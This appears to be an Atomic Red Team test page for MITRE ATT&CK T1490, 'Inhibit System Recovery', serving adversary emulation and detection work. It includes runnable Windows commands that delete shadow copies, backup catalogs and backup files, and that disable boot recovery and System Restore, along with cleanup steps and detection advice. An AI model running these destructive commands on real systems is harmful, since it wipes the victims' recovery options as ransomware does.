# T1490 - Inhibit System Recovery
Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.

Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>
* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>
* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>

## Atomic Tests

### Atomic Test #1 - Windows - Delete Volume Shadow Copies
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon
execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it
will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n
confirmation prompt. Shadow copies can only be created on Windows server or Windows 8.

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.

##### Check Prereq Commands:
```cmd
if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }

```
##### Get Prereq Commands:
```cmd
vssadmin.exe create shadow /for=c:

```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
vssadmin.exe delete shadows /all /quiet
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 1

### Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMIDeletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Shadow copies can only be created on Windows server or Windows 8.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
wmic.exe shadowcopy delete
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 2

### Atomic Test #3 - Windows - wbadmin Delete Windows Backup CatalogDeletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
"The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
wbadmin delete catalog -quiet
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 3

### Atomic Test #4 - Windows - Disable Windows Recovery Console RepairDisables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Upon execution, "The operation completed successfully." will be displayed in the powershell session.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 4

#### Cleanup: 
```cmd
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures >nul 2>&1
bcdedit.exe /set {default} recoveryenabled yes >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShellDeletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
This technique is used by numerous ransomware families such as Sodinokibi/REvil.
Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution
there may be no output displayed.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 5

### Atomic Test #6 - Windows - Delete Backup FilesDeletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
to delete files from around the system.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 6

### Atomic Test #7 - Windows - wbadmin Delete systemstatebackupDeletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
wbadmin delete systemstatebackup -keepVersions:0
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 7

### Atomic Test #8 - Windows - Disable the SR scheduled taskUse schtasks.exe to disable the System Restore (SR) scheduled task
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 8

#### Cleanup: 
```cmd
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 8 -Cleanup

### Atomic Test #9 - Disable System Restore Through RegistryModify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer. 
See how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 9

#### Cleanup: 
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1490 -TestNumbers 9 -Cleanup

## Detection
Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.

Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of <code>HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage</code>).


## Shield Active Defense
### System Activity Monitoring 
 Collect system activity logs which can reveal adversary activity. 

 Capturing system logs can show logins, user and system events, etc.  Collecting this data and potentially sending it to a centralized location can help reveal the presence of an adversary and the actions they perform on a compromised system.
#### Opportunity
There is an opportunity to create a detection with a moderately high probability of success.
#### Use Case
A defender can use process monitoring to look for command execution and command line parameters commonly used to inhibit system recovery.
#### Procedures
Ensure that systems capture and retain common system level activity artifacts that might be produced.
Monitor Windows systems for event codes that reflect an adversary changing passwords, adding accounts to groups, etc.
